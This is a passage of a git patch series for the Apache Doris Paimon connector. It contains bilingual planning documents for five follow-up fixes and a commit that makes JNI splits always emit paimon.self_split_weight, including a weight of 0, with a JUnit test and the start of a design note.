`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `82b6de0de98`**(P6 修复 C4/R2/R3 合一;前序 `f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); 已同步 push 到 `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head, force-with-lease)。 - **主线(P0–P5)**:paimon connector SPI cutover + round-3 clean-room review 的 4 个 user-approved fix 全完成 diff --git a/plan-doc/task-list-P6-fixes.md b/plan-doc/task-list-P6-fixes.md index 1bda1db08b0101..672bb4cb510e68 100644 --- a/plan-doc/task-list-P6-fixes.md +++ b/plan-doc/task-list-P6-fixes.md @@ -32,9 +32,18 @@ CREATE now says "already exists" (benign, NIT). Rewrote remote test + strengthened local test with errno assertion (RED→GREEN mutation-verified); 26/0/0 DdlRouting + 12/0/0 Engine + checkstyle clean; e2e gated. Design red-team `wf_19fd7785-165` (0 actionable). See FIX-R1-TABLE-{design,summary}.md. -- [ ] **P6-C4** thread `hive_metastore_client_timeout_second` through `ConnectorContext.getEnvironment()`. -- [ ] **P6-R2-catalog** warn-and-strip now-dead `meta.cache.paimon.table.*` keys at CREATE CATALOG. -- [ ] **P6-R3-catalog** include catalog name in `listDatabaseNames` `LOG.warn` (decide keep best-effort swallow). +- [x] **P6-C4 / R2-catalog / R3-catalog** (3 MINOR, combined) — **DONE `82b6de0de98`** — + **C4**: thread `Config.hive_metastore_client_timeout_second` (env key `hive_metastore_client_timeout_second`) + into `HmsMetaStoreProperties.toHiveConfOverrides(String)` instead of hardcoded `"10"` (byte-parity when + `fe.conf` unset; restores `HMSBaseProperties:204-208`). **R2-catalog**: **warn-only** (NOT strip; user-confirmed) + in `PaimonConnectorProvider.validateProperties` on dead `meta.cache.paimon.table.*` — keys proven dead on the + plugin path (`getMetaCacheEngine()=="default"` → never `PaimonExternalMetaCache`); warn lives in the connector, + not the connector-agnostic bridge (report's cited location = wrong layer). **R3-catalog**: **rethrow** (user- + confirmed, not just add catalog name) — `listDatabaseNames` now throws `RuntimeException("Failed to list databases + names, catalog name: ")` exactly as legacy `PaimonMetadataOps:340` (+ all other connectors propagate); + was swallowing to emptyList with a false parity comment. 280/0 paimon (+1 gated skip) + 16/0 + 3/0 + 14/0 + 12/0; + fe-core compiles; checkstyle 0; import-check clean. Design + impl red-team both 0-actionable. e2e gated. + See FIX-C4-R2-R3-CATALOG-{design,summary}.md. ## Accept-as-deviation (no code; needs user sign-off) From 7c597470a087f006fa9f32f76c04cb3783301e32 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 12:46:54 +0800 Subject: [PATCH 110/128] =?UTF-8?q?docs(catalog-spi):=20P6=20=E2=80=94=205?= =?UTF-8?q?=20deviations=20elected=20to=20fix=20(A1/A2/A3=20+=20B-R2-be/B-?= =?UTF-8?q?MC2)=20=E2=86=92=20new=20task-list-P6-deviation-fixes.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit User elected to fix five P6-review findings rather than accept them as deviations. Added a detailed single-task-loop work list (task-list-P6-deviation-fixes.md) with per-task mechanism / fix approach / files / test intent, and — for the two performance items (B-R2-be schema-dict narrowing, B-MC2 time-travel schema memo) — the explicit NO-performance-regression argument the design must reproduce and the red-team must verify. Updated HANDOFF (next session = these 5, suggested order A3→A2→B-MC2→A1→B-R2-be) and pointed task-list-P6-fixes.md's P6-DEVIATIONS section at the new file (remaining deviations stay accept-as-deviation). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 21 +++- plan-doc/task-list-P6-deviation-fixes.md | 136 +++++++++++++++++++++++ plan-doc/task-list-P6-fixes.md | 16 ++- 3 files changed, 166 insertions(+), 7 deletions(-) create mode 100644 plan-doc/task-list-P6-deviation-fixes.md diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 993564657ae31d..3e0f808569bfe7 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,7 +6,7 @@ --- -# 🎯 下一个 session 的任务 — **P6 代码修复全部 DONE(C4/R2/R3 合一 `82b6de0de98`)→ 下一个 = P6-DEVIATIONS(accept-as-deviation 批次,需用户签字)** +# 🎯 下一个 session 的任务 — **5 个 deviation→fix(A1/A2/A3 + B-R2-be/B-MC2,逐一修)→ 见 `task-list-P6-deviation-fixes.md`** > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 @@ -36,8 +36,16 @@ > `PaimonMetadataOps:340` 完全一致(且所有其它连接器都 propagate),原先吞成 emptyList 且注释谎称 parity。280/0 paimon(+1 > gated skip)+16/0+3/0+14/0+12/0;fe-core 编译过;checkstyle 0;import-check 干净;design+impl 两道红队均 0-actionable;e2e gated。 > 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`(design 红队 `wf_444e33b9-5c6`、impl 红队 `wf_b3d35e64-6b9`)。 -> **下一个 = P6-DEVIATIONS(accept-as-deviation 批次)**:~10 MINOR + ~12 NIT 刻意偏离 + wave-2 新增 + uncheckedFallbacks, -> 逐条记入新建 `deviations-log.md`(需用户签字)。这是 P6-fixes 这一批的最后一项;做完即清零。 +> **下一个 = 5 个 deviation→fix(用户决定修,非接受)**:从 P6-DEVIATIONS 里挑出 5 项转 fix,逐一走单任务循环 +> (详单见 **`task-list-P6-deviation-fixes.md`**,建议序 A3→A2→B-MC2→A1→B-R2-be):**A1** 插件 split 比例权重 +> (SPI `ConnectorScanRange` 加 `getSelfSplitWeight/getTargetSplitSize` + `PluginDrivenSplit` ctor 回填,连接器已算好只是没传 FE +> FileSplit);**A2** 重发 EXPLAIN `predicatesFromPaimon:`(连接器 `appendExplainInfo` 重转 filter);**A3** 去 +> `paimon.self_split_weight` 的 `>0` 闸(weight=0 也发,profile parity);**B-R2-be** schema-evolution 字典收窄到 +> 规划 split 的文件 schema_id(= legacy,K≤N 无回退;守卫=覆盖每个 `:483` 发的 per-file schema_id 否则 BE 硬崩;注意 +> getScanNodeProperties vs planScan 次序——需把 id 集从 planScan 透传,勿在 props 里重枚举 split);**B-MC2** 连接器侧 +> (Identifier, schemaId)→schema **不可变 memo**(time-travel 专用,latest 路不碰,bridge 不动;不可变键无 TTL;最坏=当前→无回退)。 +> ⚠️ **两个 B 项硬约束 = 不得有性能回退**:design 必须复现此处的无回退论证、红队必须验证。**这 5 项做完,再回到 P6-DEVIATIONS +> 余项**(剩余 MINOR/NIT + `PluginDrivenExternalCatalog:140` 吞异常 → `deviations-log.md` 签字)即清零 P6-fixes 批。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 @@ -86,8 +94,11 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 `PaimonExternalMetaCache`,键确死);R3-catalog **rethrow**(用户拍板)`RuntimeException` 带 catalog 名,与 legacy `PaimonMetadataOps:340` 一致(原吞成 emptyList)。280/0+16/0+3/0+14/0+12/0;checkstyle 0;两道红队 0-actionable。 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`。 - - **P6-DEVIATIONS(下一个,本批最后一项)**:~10 MINOR + ~12 NIT 刻意偏离 + wave2 新增 + uncheckedFallbacks(全 - intentional-deviation):报告已标「文档化为接受偏离」,逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 + - **5 个 deviation→fix(下一个,用户决定修)**:A1/A2/A3 + B-R2-be/B-MC2,逐一走单任务循环。完整详单(机制/修法/文件/ + **两个 B 项的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 A3→A2→B-MC2→A1→B-R2-be。 + - **P6-DEVIATIONS 余项(5 项之后,本批最后一项)**:未转 fix 的剩余 MINOR/NIT 刻意偏离 + wave2 新增 + + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常(R3/R4/R5/R6 residual 属 B8 清理、2 BLOCKER 属 B8 护栏, + 均不在此)。逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 1. **B8 legacy 删除(review 已解锁;须分阶段,按报告 §B8 deletion readiness 的 DEAD vs STILL-CONSUMED ledger)**: - **可删(DEAD,成单元同删)**:`datasource/paimon/*`(PaimonExternalCatalog/Factory、ExternalDatabase/Table、HMS/DLF/File/Rest 子类、 SysExternalTable、MetaCache 等)、`systable/PaimonSysTable`、`metacache/paimon/*` + `ExternalMetaCacheMgr.paimon()/ENGINE_PAIMON`、 diff --git a/plan-doc/task-list-P6-deviation-fixes.md b/plan-doc/task-list-P6-deviation-fixes.md new file mode 100644 index 00000000000000..d5002253ac5ba1 --- /dev/null +++ b/plan-doc/task-list-P6-deviation-fixes.md @@ -0,0 +1,136 @@ +# Task List — P6 deviation → code fixes (A1/A2/A3 + B-R2-be/B-MC2) + +> Five P6-review findings the user elected to **fix** (rather than accept-as-deviation). +> Source: `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` (§read findings, §cache findings) + the analysis +> in this conversation. The rest of P6-DEVIATIONS stays accept-as-deviation (see `task-list-P6-fixes.md`). +> +> **Process each ONE at a time** (AGENT-PLAYBOOK single-task loop): design → design red-team → implement → +> impl verify → build+UT → commit → summary → check off. Each is independent; suggested order below is by +> increasing blast radius. **B-items carry a hard constraint: NO performance regression** — the design MUST +> reproduce the no-regression argument recorded here and the red-team MUST verify it. +> +> Build/verify reminders (memory `doris-build-verify-gotchas`): paimon module needs +> `-am package -Dassembly.skipAssembly=true` (HiveConf in shade jar); checkstyle runs in `validate`; +> `tools/check-connector-imports.sh` must stay exit 0; e2e is gated (`enablePaimonTest=false`). + +## Suggested order (independent; smallest blast radius first) + +A3 → A2 → B-MC2 → A1 → B-R2-be + +--- + +## A3 — JNI split `self_split_weight` omitted when weight is 0 (NIT / profile-parity) + +- [ ] **A3** +- **Finding:** report §R1 (be). The connector gates `paimon.self_split_weight` emission on `selfSplitWeight > 0`, + so a JNI split whose computed weight is exactly 0 (non-DataSplit sys split with `rowCount()==0`, or a DataSplit + with total fileSize 0) leaves the prop unset → BE reads `-1` instead of `0`. Legacy emitted it unconditionally. +- **Impact:** profile-only — feeds only BE `_max_time_split_weight_counter`; never rows/counts/predicates/schema. +- **Fix:** drop the `> 0` gate so the weight (incl. 0) is always emitted; `PaimonScanRange.populateRangeParams:194-197` + already only reads the prop on the JNI branch, so native splits are unaffected. (Find the `if (selfSplitWeight > 0)` + guard at the prop-build site in `PaimonScanPlanProvider` / `PaimonScanRange` builder.) +- **Files:** `fe-connector-paimon/.../PaimonScanPlanProvider.java` (or the split-range builder that writes + `paimon.self_split_weight`). +- **Test intent:** a JNI split with weight 0 emits `paimon.self_split_weight=0` (RED before: prop absent). + +--- + +## A2 — EXPLAIN drops legacy `predicatesFromPaimon:` line (MINOR / missing-port) + +- [ ] **A2** +- **Finding:** report §R2 (scan). Legacy `PaimonScanNode:660-668` listed the converted Paimon `Predicate` objects + actually pushed to the SDK (or ` NONE`). The SPI `appendExplainInfo:1117` emits only generic `PREDICATES:` + + `paimonNativeReadSplits=` + VERBOSE `PaimonSplitStats`, so a silently-dropped LTZ/FLOAT/CAST conjunct is no longer + observable. Diagnostic-only; no correctness/perf impact; no regression test asserts the line. +- **Fix:** in the connector's `appendExplainInfo`, re-run `PaimonPredicateConverter` over the pushed filter and render + a `predicatesFromPaimon:` block (or ` NONE`). Byte-parity with legacy `Predicate.toString()` is NOT reconstructible — + aim for semantic equivalence. Keep it connector-side (do NOT add source-specific code to the generic node). +- **Files:** `fe-connector-paimon/.../PaimonScanPlanProvider.java` (`appendExplainInfo`), `PaimonPredicateConverter`. +- **Test intent:** EXPLAIN of a paimon scan with a pushable predicate shows `predicatesFromPaimon:` with the converted + predicate; with only non-pushable (LTZ/FLOAT/CAST) it shows the dropped state. Pin via a connector UT on the + rendered string (no live e2e needed). + +--- + +## A1 — Plugin splits get uniform split weight (legacy = proportional) (MINOR / regression) + +- [ ] **A1** +- **Finding:** report §R1 (scan). `PluginDrivenSplit` ctor (`PluginDrivenSplit.java:39-48`) forwards + path/start/length/fileSize/modTime/hosts/partitionValues to `FileSplit` but **never sets `selfSplitWeight` / + `targetSplitSize`**, so `FileSplit.getSplitWeight()` hits the null branch → `SplitWeight.standard()` (uniform). + Legacy `PaimonScanNode:499` set `targetSplitSize` on all splits, so `FederationBackendPolicy` distributed by + proportional (fileSize-sum) weight. **FE-side BE-assignment only** — no rows/route/BE-read/result change. +- **Already computed (just not threaded to FE FileSplit):** connector `computeSplitWeight():885` (fileSize-sum or + rowCount), `resolveTargetSplitSize():845`, `PaimonScanRange.getSelfSplitWeight():169`. These reach BE thrift (JNI + `paimon.self_split_weight`) but not the FE `FileSplit` scheduling fields. +- **Fix:** add `getSelfSplitWeight()` / `getTargetSplitSize()` to the SPI `ConnectorScanRange` (interface in + fe-connector-api), populate them from the connector's already-computed values, and set `FileSplit.selfSplitWeight` / + `targetSplitSize` in the `PluginDrivenSplit` ctor. **Generic, connector-agnostic** (other connectors return their + own weights / 0). Confirm the SPI default keeps non-weighting connectors at `SplitWeight.standard()` (no regression + for them). +- **Files:** `fe-connector-api/.../ConnectorScanRange.java` (new getters + default), `fe-core/.../PluginDrivenSplit.java` + (ctor), `fe-connector-paimon/.../PaimonScanRange.java` (wire the computed weight/targetSize through). +- **Test intent:** a `PluginDrivenSplit` built from a weighted `ConnectorScanRange` yields proportional + `getSplitWeight()` (RED before: `standard()`); a connector that returns no weight stays `standard()`. +- **Note:** adjacent to A3 (both about split weight) but distinct — A1 is FE scheduling, A3 is BE profile. Can be + done together or separately. + +--- + +## B-MC2 — time-travel schema re-resolved per query (no second-level cache) (NIT / CACHE-P1) — **NO PERF REGRESSION** + +- [ ] **B-MC2** +- **Finding:** report §MC2. `PluginDrivenMvccExternalTable.loadSnapshot:259-262` resolves schema-at-snapshot via + `metadata.getTableSchema(pinnedHandle, snapshot)` (a `schemaAt` round-trip) **every query** and pins it to the + per-statement `PluginDrivenMvccSnapshot` only. Repeated time-travel to the same snapshot re-reads it; legacy served + it from the shared `(NameMapping, schemaId)` cache (repeat = hit). Latest reads are unaffected (cached via super). +- **Fix (connector-side immutable memo — bridge UNCHANGED):** add a bounded + `Map<(Identifier, schemaId) → ConnectorTableSchema>` memo inside the connector's schema-at-snapshot resolve + (`PaimonConnectorMetadata.getTableSchema` for the pinned case / `PaimonTableResolver`). Check memo first; on miss do + the `schemaAt` read and populate. Keyed by `snapshot.schemaId()`. +- **NO-regression argument (MUST hold + be red-team-verified):** + 1. **Immutable keys** — a committed paimon schemaId's schema never changes → no TTL/invalidation needed, no stale + read. (Cleared only on REFRESH CATALOG = connector rebuild.) + 2. **Latest path untouched** — MC2 is the time-travel branch only; latest still flows + `getSchemaCacheValue:361 → getLatestSchemaCacheValue → super` (generic cache). No change there. + 3. **Worst case = current** — bound the memo (maxSize); immutable values mean an evicted entry just re-reads + (= today's behavior), never slower. Hit = faster (= legacy). +- **Files:** `fe-connector-paimon/.../PaimonConnectorMetadata.java` (or `PaimonTableResolver.java`). +- **Test intent:** two time-travel resolves at the same schemaId trigger ONE underlying `schemaAt` read (second is a + memo hit); a different schemaId reads again; latest-path resolves are unaffected. Drive via the recording + catalog-ops seam (count underlying reads). +- **Design note:** this locally re-introduces what CACHE-P1 dropped, but scoped to time-travel + immutable + bounded — + the report explicitly sanctioned it ("reintroduce a schemaId-keyed memo without touching the bridge"). + +--- + +## B-R2-be — `history_schema_info` eager superset → narrow to referenced schema_ids (NIT / intentional) — **NO PERF REGRESSION** + +- [ ] **B-R2-be** +- **Finding:** report §R2 (be). `buildSchemaEvolutionParam:1214-1232` emits the `-1` (current, from requested columns — + cheap, keep) PLUS **one entry per `schemaManager.listAllIds()`** — reading every committed schema file even for a + single-schema query. Legacy added entries lazily, one per distinct file `schema_id` a split referenced, + `-1`. +- **Fix (narrow to referenced ids = legacy behavior):** build the historical entries only for the **distinct file + `schema_id`s of the planned splits** (∪ `{-1}`), instead of `listAllIds()`. Those ids are already enumerated at + `planScan:483` (`.schemaId(file.schemaId())`) — collect them into a `Set` (zero new I/O; files already in + memory). +- **NO-regression argument (MUST hold + be red-team-verified):** let N = total committed schemas, K = distinct schema + ids in the query's files. K ≤ N always (single-schema query K=1 vs N; all-schema query K=N = same as today). Reads + are **always ≤ current, never more**. Collecting ids is a CPU set-op over already-loaded files. No new I/O. +- **CORRECTNESS guard (critical):** BE looks up each split by its emitted per-file `schema_id` and **fails loud** + (`"miss table/file schema info"`, `table_schema_change_helper.h`) if absent. The narrowed set + `{all planned files' file.schemaId()} ∪ {-1}` is **exactly** the set BE references (`:483` emits those) — neither + under- nor over-covers. The `-1`/current entry (built from requested columns, not a schema read) stays as-is. +- **KEY implementation caveat = call order:** the dict is built in `getScanNodeProperties` + (`PluginDrivenScanNode.getOrLoadPropertiesResult:1034`), but the schema_id set comes from `planScan`. The design + MUST confirm the lifecycle order; if props are built before splits, **thread the planned-split schema_id set into the + dict build, or defer the dict build until after `planScan`** — do NOT re-enumerate splits inside the props build + (that would be a NEW I/O cost = a regression). +- **Optional complementary (also no-regression, order-independent):** memoize `schemaManager.schema(id)→fields` by + schemaId in the connector (committed schemas immutable → no TTL) so the narrowed reads are also cached across scans + (legacy did this via `PaimonExternalMetaCache`). Combine with the narrowing or ship separately. +- **Files:** `fe-connector-paimon/.../PaimonScanPlanProvider.java` (`buildSchemaEvolutionParam`, `planScan` to collect + ids, the props-build threading); possibly the SPI/bridge if the schema_id set must cross from planScan to props. +- **Test intent:** a query touching files of only schema id X emits a dict with entries `{-1, X}` (NOT all committed + ids); a query spanning ids {X,Y} emits `{-1, X, Y}`; every emitted per-split `schema_id` is present in the dict + (BE-fail-loud guard). RED before: dict contains all `listAllIds()`. diff --git a/plan-doc/task-list-P6-fixes.md b/plan-doc/task-list-P6-fixes.md index 672bb4cb510e68..d3a75ea51e9d5a 100644 --- a/plan-doc/task-list-P6-fixes.md +++ b/plan-doc/task-list-P6-fixes.md @@ -45,7 +45,19 @@ fe-core compiles; checkstyle 0; import-check clean. Design + impl red-team both 0-actionable. e2e gated. See FIX-C4-R2-R3-CATALOG-{design,summary}.md. +## Converted deviations → code fixes (user elected to fix, NOT accept) + +- [ ] **A1/A2/A3 + B-R2-be/B-MC2** — 5 P6 findings pulled out of P6-DEVIATIONS to be fixed. Full per-task detail + (mechanism / fix / files / **no-regression argument for the two B perf items** / test intent) in + **[`task-list-P6-deviation-fixes.md`](./task-list-P6-deviation-fixes.md)**. Process one at a time there. + Summary: A1 = plugin split proportional weight (SPI `ConnectorScanRange` getters + `PluginDrivenSplit` ctor); + A2 = re-emit EXPLAIN `predicatesFromPaimon:`; A3 = drop `>0` gate on JNI `self_split_weight`; + B-R2-be = narrow schema-evolution dict to referenced split schema_ids; B-MC2 = connector-side immutable + (Identifier, schemaId) schema memo for time-travel. + ## Accept-as-deviation (no code; needs user sign-off) -- [ ] **P6-DEVIATIONS** — ~10 MINOR + ~12 NIT intentional deviations + wave-2 new items + uncheckedFallbacks - (see report §Legacy-diff ledger "intended=Yes" rows + §Wave 2 new findings). Record each in `deviations-log.md`. +- [ ] **P6-DEVIATIONS (remainder)** — the deviations NOT converted to fixes above: ~remaining MINOR/NIT intentional + deviations + wave-2 new items + the residual `PluginDrivenExternalCatalog:140` authenticator-wiring swallow + (see report §Legacy-diff ledger "intended=Yes" rows + §Wave 2 new findings; note R3/R4/R5/R6 residual are + B8-cleanup, the 2 BLOCKERs are B8 guardrails — neither belongs here). Record each in `deviations-log.md`. From 5fa47c27eb8366a977365bc6fbce564ff996ef84 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 13:19:52 +0800 Subject: [PATCH 111/128] =?UTF-8?q?fix:=20FIX-A3=20=E2=80=94=20emit=20paim?= =?UTF-8?q?on.self=5Fsplit=5Fweight=20(incl.=200)=20for=20JNI=20splits?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: PaimonScanRange's constructor gated emission of the BE thrift profile property paimon.self_split_weight on the value selfSplitWeight > 0. selfSplitWeight is a primitive long defaulting to 0, so the > 0 check doubled as a crude is-set proxy and dropped a genuine weight-0 JNI split (a non-DataSplit system split with rowCount()==0, or a DataSplit whose files sum to fileSize==0). BE then read its -1 unset sentinel (paimon_jni_reader.cpp:95) instead of 0, corrupting the _max_time_split_weight_counter profile counter. Legacy PaimonScanNode.setPaimonParams:274 sets the weight unconditionally on the JNI branch and never on the native branch (parity rule: emit iff JNI split). Solution: gate emission on the JNI marker (builder.paimonSplit != null) instead of the value. Emits the genuine weight incl. 0 for every JNI split, never adds the key to native splits (exact legacy parity), and is symmetric with the consumer (populateRangeParams reads the prop iff paimon.split present). Both JNI build sites always set paimonSplit AND selfSplitWeight, so the gate can neither under- nor over-emit; weight is provably >= 0, so this is BE-thrift-identical to the task-list's literal 'drop the > 0 gate'. Profile-only; no SPI/BE change. Tests: new PaimonScanRangeSelfSplitWeightTest (3): weight-0 JNI emits 0 (isSetSelfSplitWeight && getSelfSplitWeight==0, RED before the fix, verified by a separate run); positive JNI; native carries no weight + no props key (gate pin vs >= 0). 283/0/0/1skip module-wide; checkstyle 0; import-check 0. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/paimon/PaimonScanRange.java | 9 +- .../PaimonScanRangeSelfSplitWeightTest.java | 100 ++++++++++++ .../FIX-A3-SELF-SPLIT-WEIGHT-design.md | 145 ++++++++++++++++++ .../FIX-A3-SELF-SPLIT-WEIGHT-summary.md | 62 ++++++++ plan-doc/task-list-P6-deviation-fixes.md | 6 +- 5 files changed, 320 insertions(+), 2 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangeSelfSplitWeightTest.java create mode 100644 plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-design.md create mode 100644 plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-summary.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java index ab683859de38d9..4e48e2baa07f85 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java @@ -89,7 +89,14 @@ private PaimonScanRange(Builder builder) { if (builder.rowCount != null) { props.put("paimon.row_count", String.valueOf(builder.rowCount)); } - if (builder.selfSplitWeight > 0) { + // FIX-A3: emit the self-split-weight for every JNI split, incl. weight 0. Legacy + // PaimonScanNode.setPaimonParams:274 sets it unconditionally on the JNI branch (never on + // native); the old `selfSplitWeight > 0` gate was a buggy is-set proxy that dropped a genuine + // weight-0 JNI split (rowCount-0 sys split / fileSize-0 DataSplit) -> BE read the -1 "unset" + // sentinel instead of 0, corrupting the _max_time_split_weight_counter profile. Gate on the + // JNI marker (paimonSplit) so native splits keep parity; this is also exactly when + // populateRangeParams reads the prop. + if (builder.paimonSplit != null) { props.put("paimon.self_split_weight", String.valueOf(builder.selfSplitWeight)); } this.properties = Collections.unmodifiableMap(props); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangeSelfSplitWeightTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangeSelfSplitWeightTest.java new file mode 100644 index 00000000000000..719c71cd8b6bd1 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangeSelfSplitWeightTest.java @@ -0,0 +1,100 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.thrift.TFileRangeDesc; +import org.apache.doris.thrift.TTableFormatFileDesc; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * FIX-A3 (P6 deviation) — pins that {@link PaimonScanRange} emits the BE thrift profile property + * {@code paimon.self_split_weight} for every JNI split including a genuine weight of 0, + * matching legacy {@code PaimonScanNode.setPaimonParams:274} (which calls {@code setSelfSplitWeight} + * unconditionally on the JNI branch and never on the native branch). + * + *

    The pre-fix {@code selfSplitWeight > 0} gate dropped a weight-0 JNI split (a non-DataSplit + * system split with {@code rowCount()==0}, or a DataSplit whose files sum to {@code fileSize==0}), so + * BE read the {@code -1} "unset" sentinel ({@code paimon_jni_reader.cpp:95}) instead of {@code 0} and + * the {@code _max_time_split_weight_counter} profile counter was wrong. Profile-only — never touches + * rows / counts / predicates / schema / routing. + */ +public class PaimonScanRangeSelfSplitWeightTest { + + private static TFileRangeDesc populate(PaimonScanRange range) { + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + range.populateRangeParams(new TTableFormatFileDesc(), rangeDesc); + return rangeDesc; + } + + @Test + public void jniSplitWithZeroWeightEmitsZero() { + // A JNI split whose genuine self-split weight is 0 (e.g. a rowCount()==0 system split). + PaimonScanRange range = new PaimonScanRange.Builder() + .fileFormat("orc") + .paimonSplit("serialized-split") // JNI marker + .selfSplitWeight(0L) + .build(); + + // BE-visible (load-bearing): populateRangeParams must SET the thrift weight to 0 so BE reads 0 + // instead of its -1 unset default. MUTATION: restoring the old `selfSplitWeight > 0` gate -> + // prop absent -> setSelfSplitWeight never called -> isSetSelfSplitWeight() false -> BE -1 -> red. + TFileRangeDesc desc = populate(range); + Assertions.assertTrue(desc.isSetSelfSplitWeight(), + "a weight-0 JNI split must still set the thrift self_split_weight (legacy :274 parity)"); + Assertions.assertEquals(0L, desc.getSelfSplitWeight()); + Assertions.assertEquals("0", range.getProperties().get("paimon.self_split_weight")); + } + + @Test + public void jniSplitWithPositiveWeightEmitsWeight() { + // Positive-case coverage (NEW — no prior test asserted self_split_weight). + PaimonScanRange range = new PaimonScanRange.Builder() + .fileFormat("orc") + .paimonSplit("serialized-split") + .selfSplitWeight(4096L) + .build(); + + TFileRangeDesc desc = populate(range); + Assertions.assertTrue(desc.isSetSelfSplitWeight()); + Assertions.assertEquals(4096L, desc.getSelfSplitWeight()); + Assertions.assertEquals("4096", range.getProperties().get("paimon.self_split_weight")); + } + + @Test + public void nativeSplitNeverCarriesWeight() { + // A native (ORC/Parquet) split: no paimonSplit marker; weight defaults to 0. + PaimonScanRange range = new PaimonScanRange.Builder() + .fileFormat("parquet") + .path("s3://bkt/a/part-0.parquet") + .build(); + + // BE-visible parity: the native branch of populateRangeParams sets only the format, never the + // weight, exactly like legacy PaimonScanNode's native branch (no setSelfSplitWeight call). + TFileRangeDesc desc = populate(range); + Assertions.assertFalse(desc.isSetSelfSplitWeight(), + "native splits must not carry self_split_weight (legacy native branch never sets it)"); + + // Gate-choice pin (NOT BE-visible): the JNI-marker gate must not add the key to a native + // split's props map. MUTATION: switching the gate to `selfSplitWeight >= 0` makes a native + // split (default weight 0) gain a `paimon.self_split_weight=0` key here -> red. + Assertions.assertFalse(range.getProperties().containsKey("paimon.self_split_weight"), + "the JNI-marker gate must not emit self_split_weight for a native split"); + } +} diff --git a/plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-design.md b/plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-design.md new file mode 100644 index 00000000000000..ec20571ee95dc6 --- /dev/null +++ b/plan-doc/designs/FIX-A3-SELF-SPLIT-WEIGHT-design.md @@ -0,0 +1,145 @@ +# FIX-A3 — JNI split `self_split_weight` omitted when weight is 0 + +> Source: `task-list-P6-deviation-fixes.md` §A3 / `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R1 (be). +> Severity: **NIT** (profile-parity only). Smallest blast radius of the 5 deviation→fixes. + +## Problem + +The paimon connector gates emission of the BE thrift profile property `paimon.self_split_weight` +on the **value** `selfSplitWeight > 0`. A JNI split whose computed weight is exactly **0** therefore +leaves the property unset, and BE falls back to `-1` instead of `0`. + +Weight-0 JNI splits are real: +- a non-`DataSplit` metadata/system split with `split.rowCount() == 0` + (`buildJniScanRange:732` → `splitWeight = split.rowCount()`), or +- a `DataSplit` whose data files sum to `fileSize == 0` (`computeSplitWeight:885-891`). + +Legacy emitted the weight **unconditionally** for every JNI split (incl. 0). + +## Root Cause + +`PaimonScanRange` constructor, `fe-connector-paimon/.../PaimonScanRange.java:92`: + +```java +if (builder.selfSplitWeight > 0) { // <-- value gate + props.put("paimon.self_split_weight", String.valueOf(builder.selfSplitWeight)); +} +``` + +The `> 0` predicate was doing double duty as a crude "is this set?" proxy. `selfSplitWeight` is a +primitive `long` defaulting to `0`, so it conflates two distinct things: +1. native splits (which never call `.selfSplitWeight(...)`, default 0) — should NOT emit, and +2. 